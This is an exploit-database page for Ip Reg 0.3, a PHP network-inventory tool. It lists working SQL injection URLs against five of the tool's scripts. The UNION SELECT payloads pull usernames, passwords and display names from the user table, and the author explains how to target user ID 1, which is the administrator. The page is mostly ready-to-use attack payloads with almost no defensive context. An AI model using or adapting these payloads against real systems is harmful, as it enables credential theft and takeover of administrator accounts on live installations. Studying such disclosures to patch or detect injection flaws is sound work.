[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Ip Reg 0.3 Multiple Remote SQL Injection Vulnerabilities

Author
MhZ91
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2388
Category
web applications
Date add
22-12-2007
Platform
unsorted
========================================================
Ip Reg 0.3 Multiple Remote SQL Injection Vulnerabilities
========================================================



---------------------------------------------------------------
 ____            __________         __             ____  __   
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ 
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |  
 |___|___|  /\__|  /______  /\___  >__|            |___||__|  
          \/\______|      \/     \/                           

---------------------------------------------------------------

	 Multiple Remote Sql Injection

---------------------------------------------------------------

# Author: MhZ91 
# Title: Ip Reg v0.3 - Remote Sql Injection
# Bug: Remote Sql Injection
# Info: IP Reg is a IPAM tool to keep track of assets, nodes (IP addresses, MAC addresses, DNS aliases) within different subnets, over different locations or even VLAN's. Written in PHP, use it with a MySQL-database to have a unique insight in your local network

---------------------------------------------------------------

http://[site]/vlanview.php?vlan_id='+union+select+1,2,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*

http://[site]/vlanedit.php?vlan_id='+union+select+1,2,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*

http://[site]/vlandel.php?vlan_id='+union+select+1,2,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*

http://[site]/assetclassgroupview.php?assetclassgroup_id='+union+select+1,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*

http://[site]/nodelist.php?subnet_id='+union+select+1,2,3,4,5,6,7,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*

There is other more sql injection.

For get user, password and status of the members, u must edit [UserID] whit number.. The number 1 it's the default id of the admin.
---------------------------------------------------------------



#  0day.today [2024-12-25]  #